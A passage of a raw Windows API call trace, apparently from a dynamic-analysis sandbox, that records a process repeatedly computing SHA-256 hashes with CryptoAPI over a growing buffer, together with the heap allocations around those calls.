Flags=0x8, Size=0x20) returned 0x32e57850 [0146.975] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e57850, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57850, pdwDataLen=0xcea1c) returned 1 [0146.975] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.975] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.975] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.976] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.976] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0146.976] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.976] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57a60 [0146.976] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57a60, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57a60, pdwDataLen=0xcea1c) returned 1 [0146.976] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.976] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.976] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.976] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.976] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0146.977] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.977] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57250 [0146.977] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57250, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57250, pdwDataLen=0xcea1c) returned 1 [0146.977] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.977] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.977] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.977] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.977] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0146.977] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.977] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57100 [0146.977] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e57100, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57100, pdwDataLen=0xcea1c) returned 1 [0146.977] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.977] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.977] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.978] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.978] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0146.978] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.978] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57880 [0146.978] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e57880, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57880, pdwDataLen=0xcea1c) returned 1 [0146.978] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.978] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.978] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.979] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.979] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0146.979] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.979] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e56fb0 [0146.979] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e56fb0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e56fb0, pdwDataLen=0xcea1c) returned 1 [0146.979] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.979] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.979] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.979] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.979] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0146.979] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.980] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57580 [0146.980] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e57580, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57580, pdwDataLen=0xcea1c) returned 1 [0146.980] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.980] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.980] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.980] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.980] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0146.980] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.980] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57370 [0146.980] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57370, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57370, pdwDataLen=0xcea1c) returned 1 [0146.980] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.980] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.980] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.981] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.981] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0146.981] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.981] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e578e0 [0146.981] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e578e0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e578e0, pdwDataLen=0xcea1c) returned 1 [0146.981] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.981] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.981] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.982] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.982] CryptHashData (hHash=0x332b7dd0, pbData=0x32e4a600, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0146.982] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.982] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e579a0 [0146.982] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e579a0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e579a0, pdwDataLen=0xcea1c) returned 1 [0146.982] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0146.982] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.982] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.982] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.982] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0146.982] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.982] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57040 [0146.982] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e57040, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57040, pdwDataLen=0xcea1c) returned 1 [0146.982] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.982] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.982] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.983] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.983] CryptHashData (hHash=0x332b79e0, pbData=0x32e4a600, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0146.983] CryptGetHashParam (in: hHash=0x332b79e0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.983] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e573a0 [0146.983] CryptGetHashParam (in: hHash=0x332b79e0, dwParam=0x2, pbData=0x32e573a0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e573a0, pdwDataLen=0xcea1c) returned 1 [0146.983] CryptDestroyHash (hHash=0x332b79e0) returned 1 [0146.983] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.983] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.984] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.984] CryptHashData (hHash=0x332b7970, pbData=0x32e4a600, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0146.984] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.984] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57070 [0146.984] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e57070, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57070, pdwDataLen=0xcea1c) returned 1 [0146.984] CryptDestroyHash (hHash=0x332b7970) returned 1 [0146.984] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.984] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.984] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.984] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0146.984] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.984] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e574f0 [0146.984] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e574f0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e574f0, pdwDataLen=0xcea1c) returned 1 [0146.984] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.984] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.984] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.985] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.985] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0146.985] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.985] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57160 [0146.985] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e57160, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57160, pdwDataLen=0xcea1c) returned 1 [0146.985] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.985] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.985] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.986] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.986] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0146.986] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.986] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e571c0 [0146.986] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e571c0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e571c0, pdwDataLen=0xcea1c) returned 1 [0146.986] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.986] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.986] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.986] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.986] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xf40, dwFlags=0x0) returned 1 [0146.986] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.986] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58090 [0146.986] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e58090, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e58090, pdwDataLen=0xcea1c) returned 1 [0146.986] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.986] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.986] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.987] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.987] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xf60, dwFlags=0x0) returned 1 [0146.987] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.987] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57fd0 [0146.987] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e57fd0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e57fd0, pdwDataLen=0xcea1c) returned 1 [0146.987] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.987] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.987] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.988] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.988] CryptHashData (hHash=0x332b7ac0, pbData=0x32e4a600, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0146.988] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.988] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58210 [0146.988] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e58210, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e58210, pdwDataLen=0xcea1c) returned 1 [0146.988] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0146.988] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.988] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.988] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.988] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0146.989] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.989] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e580f0 [0146.989] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.989] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.989] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.990] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.990] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0146.990] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57f70 [0146.990] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.990] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.990] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.991] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.991] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0146.991] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57be0 [0146.991] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.991] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.991] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.992] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.992] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0146.992] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57b80 [0146.992] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.992] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.993] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a600 | out: hHeap=0x2150000) returned 1 [0146.993] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e4a600 [0146.993] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.993] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.993] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x20, dwFlags=0x0) returned 1 [0146.993] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57d00 [0146.993] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.993] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.993] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.994] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.994] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0x40, dwFlags=0x0) returned 1 [0146.994] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e580c0 [0146.994] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0146.994] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.994] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.995] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.995] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x60, dwFlags=0x0) returned 1 [0146.995] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58060 [0146.995] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.995] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.995] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.995] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.995] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x80, dwFlags=0x0) returned 1 [0146.995] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e58240 [0146.995] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.995] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.995] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.996] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.996] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0146.996] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57f10 [0146.996] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.996] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.996] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.996] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.996] CryptHashData (hHash=0x332b7820, pbData=0x32e4a600, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0146.997] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e57c70 [0146.997] CryptDestroyHash (hHash=0x332b7820) returned 1 [0146.997] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.997] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.997] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.997] 